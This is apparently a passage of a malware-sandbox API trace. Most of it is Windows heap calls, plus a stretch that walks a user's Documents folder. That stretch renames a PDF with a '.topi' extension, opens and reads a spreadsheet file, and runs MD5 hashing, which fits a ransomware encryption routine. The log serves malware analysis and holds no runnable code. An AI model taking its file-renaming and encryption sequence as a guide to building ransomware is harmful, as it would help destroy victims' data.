RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2538 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02438 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97c8 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97e0 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.065] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d97e0 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d97c8 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.066] GetCurrentThreadId () returned 0x8c4 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7530 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.066] GetCurrentThreadId () returned 0x8c4 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97c8 [0096.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.068] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\NzE7TJwJoje1EO.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\nze7tjwjoje1eo.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\NzE7TJwJoje1EO.pdf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\nze7tjwjoje1eo.pdf.topi")) returned 1 [0096.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.068] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91296af0, ftCreationTime.dwHighDateTime=0x1d5bd7d, ftLastAccessTime.dwLowDateTime=0xd2c325d0, ftLastAccessTime.dwHighDateTime=0x1d5c450, ftLastWriteTime.dwLowDateTime=0xd2c325d0, ftLastWriteTime.dwHighDateTime=0x1d5c450, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P63p r8YwN7PV", cAlternateFileName="P63PR8~1")) returned 1 [0096.070] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.070] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.070] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\") returned="lt6ZzNEQACj\\" [0096.070] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.070] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.070] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.070] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.070] PathFindFileNameW (pszPath="") returned="" [0096.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\4yC3PRKC1q.ods") returned=".ods" [0096.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\4yC3PRKC1q.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\4yc3prkc1q.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.071] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=45094) returned 1 [0096.071] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.074] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xb000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.074] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.075] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.076] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.076] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.076] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.076] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.076] GetLastError () returned 0x0 [0096.076] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.076] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.076] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.076] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.076] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb030) returned 0x9a06a00 [0096.076] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02438 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02480 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97b0 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97e0 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.077] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d97f8 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d97e0 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.078] GetCurrentThreadId () returned 0x8c4 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f75c0 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.079] GetCurrentThreadId () returned 0x8c4 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97e0 [0096.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97c8 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9810 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97e0 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 